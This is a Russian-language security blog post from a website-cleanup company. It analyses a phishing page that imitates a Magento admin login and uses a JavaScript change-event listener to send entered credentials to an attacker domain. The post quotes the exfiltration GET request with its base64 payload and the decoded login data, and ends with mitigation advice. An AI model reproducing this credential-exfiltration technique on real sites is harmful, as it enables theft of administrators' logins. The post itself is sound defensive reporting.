• Вконтакте
  • Facebook
  • Twitter
  • Instagram
  • Telegram
  • Viber
  • WhatsApp
Республика Беларусь г. Минск, ул. Герасименко 29
+375 29 236-68-17
+375 29 228-06-03
Заказать звонок
СтопВирус
О компании
  • О компании
  • Партнеры
  • Отзывы
  • Реквизиты
  • Вопрос ответ
Отзывы
Гарантии
Новости
Услуги
  • Удаление вирусов с сайта
    • Комплексная защита
    • Диагностика безопасности
    • Сайт под наблюдением
    • Срочная помощь
  • Обслуживание ПК NEW
    • Ремонт ноутбуков
    • Ремонт компьютеров
    • Установка Windows
    • Настройка сетей Ethernet
Блог
Контакты
Ещё
    СтопВирус
    Меню  
    • О компании
      • О компании
      • Партнеры
      • Отзывы
      • Реквизиты
      • Вопрос ответ
    • Отзывы
    • Гарантии
    • Новости
    • Услуги
      • Удаление вирусов с сайта  
        • Комплексная защита
        • Диагностика безопасности
        • Сайт под наблюдением
        • Срочная помощь
      • Обслуживание ПК NEW  
        • Ремонт ноутбуков
        • Ремонт компьютеров
        • Установка Windows
        • Настройка сетей Ethernet
    • Блог
    • Контакты
    Заказать звонок
    +375 29 236-68-17
    +375 29 228-06-03
    СтопВирус
    • О компании
      • Назад
      • О компании
      • О компании
      • Партнеры
      • Отзывы
      • Реквизиты
      • Вопрос ответ
    • Отзывы
    • Гарантии
    • Новости
    • Услуги
      • Назад
      • Услуги
      • Удаление вирусов с сайта
        • Назад
        • Удаление вирусов с сайта
        • Комплексная защита
        • Диагностика безопасности
        • Сайт под наблюдением
        • Срочная помощь
      • Обслуживание ПК NEW
        • Назад
        • Обслуживание ПК NEW
        • Ремонт ноутбуков
        • Ремонт компьютеров
        • Установка Windows
        • Настройка сетей Ethernet
    • Блог
    • Контакты
    • +375 29 236-68-17
      • Назад
      • Обратная связь
      • +375 29 236-68-17
      • +375 29 228-06-03
      • Заказать звонок
    Будьте на связи
    Республика Беларусь г. Минск, ул. Герасименко 29
    support@stopvirus.by
    • Facebook
    • Вконтакте
    • Twitter
    • Instagram
    • Telegram
    • Viber
    • WhatsApp

    Еженедельное обновление Magento Фишинг Использует JavaScript

    Еженедельное обновление Magento Фишинг Использует JavaScript

    Во время недавнего расследования на скомпрометированном веб-сайте была обнаружена фишинговая страница входа администратора Magento с именем файла wp-order.php. Это странный выбор имени файла для фишинговой страницы Magento, но тем не менее он успешно загружает законно выглядящий Magento 1.x страница входа в систему.

    Фишинг Админ Панели Magento

    Однако то, что не сразу видно или очевидно жертвам, заключается в том, что элементы страницы, такие как изображения и структура CSS, почти все загружаются из вредоносного домена — orderline[.] клуб:

    Вредоносный Домен

    Сбор Учетных Данных Для Входа В Magento

    Для эксфильтрации украденных данных фишинговая страница использует метод, который не требует отдельного PHP-файла или полагается на PHP-функции для отправки электронной почты злоумышленнику, что мы часто находим для эксфильтрации на фишинговых страницах, подобных этой.

    Вместо этого эта фишинговая атака использует метод JavaScript EventListener (addEventListener) с событием change для полей username и login (password) :

    После того как имя пользователя и пароль введены и жертва меняет фокус страницы (например, щелкает) вне полей входа в систему, фишинговая страница автоматически отправляет запрос GET на URL-адрес orderline [.] клуб/fget.php с украденными регистрационными данными.

    GET /fget.php?eyJ1cmwiOiJodHRwOi8vbG9jYWxob3N0l3dwlw9yzgvylnboccisimxvz2luijoiywrtaw4ilcjwyxnzijoiywrtaw4ifq==
    

    Этот GIF демонстрирует, как отправляется запрос GET, когда кто-то вводит данные для входа в поля, независимо от того, нажимает ли он кнопку входа:

    Эксфильтрация Данных

    Как вы можете видеть, украденные регистрационные данные кодируются base64 и отправляются в качестве запроса злоумышленнику. Если вы декодируете base64 из отправленного запроса GET, то вам останется только:

    {"url":"http://localhost/wp-order.php","login":"admin","pass":"admin"}
    

    Заключение И Меры По Смягчению Последствий

    Сам код, по-видимому, указывает на то, что эта фишинговая страница все еще находится в стадии разработки злоумышленником, поэтому вполне возможно, что в будущем этот стиль эксфильтрации станет более популярным на фишинговых страницах.

    Фишинг может быть трудно обнаружить, но владельцы веб-сайтов могут использовать решение для мониторинга целостности файлов, чтобы помочь выявить признаки компрометации. Google Search Console также может пригодиться для получения уведомлений о проблемах безопасности, таких как фишинг.


    Поделиться
    Назад к списку
    • Комментарии
    Загрузка комментариев...
    Категории
    • CMS3
    • Новости8
    • Новые вирусы44
    • Партнеры2
    Это интересно
    • Поддельная версия плагина jQuery заразила множество сайтов
      Поддельная версия плагина jQuery заразила множество сайтов
      28 апреля 2021
    • Еженедельное обновление WP.Core.5.5.2.CVE
      Еженедельное обновление WP.Core.5.5.2.CVE
      30 октября 2020
    • Еженедельное обновление WP.Core.5.4.2.CVE
      Еженедельное обновление WP.Core.5.4.2.CVE
      7 октября 2020
    • Еженедельное обновление WP.Elementor.5.CVE
      Еженедельное обновление WP.Elementor.5.CVE
      1 октября 2020
    • Еженедельное обновление Drupal.CVE.Core-2020-007
      Еженедельное обновление Drupal.CVE.Core-2020-007
      1 октября 2020
    • Еженедельное обновление Drupal.CVE.Core-2020-009
      Еженедельное обновление Drupal.CVE.Core-2020-009
      1 сентября 2020
    • Еженедельное обновление WP.ElementorPRO.CVE
      Еженедельное обновление WP.ElementorPRO.CVE
      7 мая 2020
    • Еженедельное обновление Drupal.CVE.Core-2020-004/5/6
      Еженедельное обновление Drupal.CVE.Core-2020-004/5/6
      8 апреля 2020
    • Еженедельное обновление WP.AllinOneSEOPack.CVE
      Еженедельное обновление WP.AllinOneSEOPack.CVE
      18 марта 2020
    • Еженедельное обновление WP.FastestCache.CVE
      Еженедельное обновление WP.FastestCache.CVE
      9 марта 2020
    • Еженедельное обновление WP.Slider.CVE
      Еженедельное обновление WP.Slider.CVE
      7 февраля 2020
    • Еженедельное обновление WP.Elementor.2.CVE
      Еженедельное обновление WP.Elementor.2.CVE
      6 февраля 2020
    • Еженедельное обновление версии 3.9.21 Joomla
      Еженедельное обновление версии 3.9.21 Joomla
      5 февраля 2020
    • Еженедельное обновление WP.DatabaseReset.CVE
      Еженедельное обновление WP.DatabaseReset.CVE
      28 января 2020
    • Еженедельное обновление Bitrix.Trojan.11
      Еженедельное обновление Bitrix.Trojan.11
      2 января 2020
    • Еженедельное обновление WP.WooCommerce.CVE
      Еженедельное обновление WP.WooCommerce.CVE
      23 декабря 2019
    • Еженедельное обновление Drupal.CVE.Core-2019-012
      Еженедельное обновление Drupal.CVE.Core-2019-012
      1 октября 2019
    • Magento Guruincsite массовая блокировка сайтов
      Magento Guruincsite массовая блокировка сайтов
      22 октября 2015
    • Еженедельное обновление WP.ContactForm7.CVE
      Еженедельное обновление WP.ContactForm7.CVE
    • Еженедельное обновление WP.Loginizer.CVE
      Еженедельное обновление WP.Loginizer.CVE
    Облако тегов
    WordPressВирусы на сайтена сайте вирусыОчистить сайт от вирусовПроверить сайт на вирусыУдаление вирусов на сайтеудаление вирусов на сайтеуязвимости на сайте
    Компания
    О компании
    Партнеры
    Отзывы
    Реквизиты
    Вопрос ответ
    Продукты
    Антивирус для сайта
    Хостинг
    Услуги
    Удаление вирусов с сайта
    Обслуживание ПК NEW
    О сервисе
    Прейскурант цен
    Польз. соглашение
    Политика конфид.
    Наши контакты


    +375 (29) 236-68-17
    +375 (29) 228-06-03
    support@stopvirus.by
    Республика Беларусь г. Минск, ул. Герасименко 29
    ©2013-2023 Все права защищены Stopvirus.by.
    Все материалы данного сайта являются объектами авторского права (в том числе дизайн). Запрещается копирование, распространение (в том числе путем копирования на другие сайты и ресурсы в Интернете) или любое иное использование информации и объектов без предварительного согласия правообладателя.
    По всем вопросам пишите на support@stopvirus.by
    УНП:490932810, ИП Жидко Леонид Александрович, Республика Беларусь, Гомельская обл. г. Рогачев ул. Кирова, д. 37, кв. 72, принимаем звонки с 9:00 до 21:00.
    Безопасный сервер WEBPAY устанавливает шифрованное соединение по защищенному протоколу TLS и конфиденциально принимает от клиента данные его платёжной карты (номер карты, имя держателя, дату окончания действия, и контрольный номер банковской карточке CVC/CVC2). После совершения оплаты с использованием банковской карты необходимо сохранять полученные карт-чеки (подтверждения об оплате) для сверки с выпиской из карт-счёта (с целью подтверждения совершённых операций в случае возникновения спорных ситуаций). В случае, если Вы не получили заказ (не оказана услуга), Вам необходимо обратиться (в службу технической поддержки) по телефонам +375292366817 или e-mail support@stopvirus.by. Менеджеры Вас проконсультируют. При оплате банковской платежной картой возврат денежных средств осуществляется на карточку, с которой была произведена оплата. Оплата при помощи WebPay
    Онлайн оплата
    • Вконтакте
    • Facebook
    • Twitter
    • Instagram
    • Telegram
    • Viber
    • WhatsApp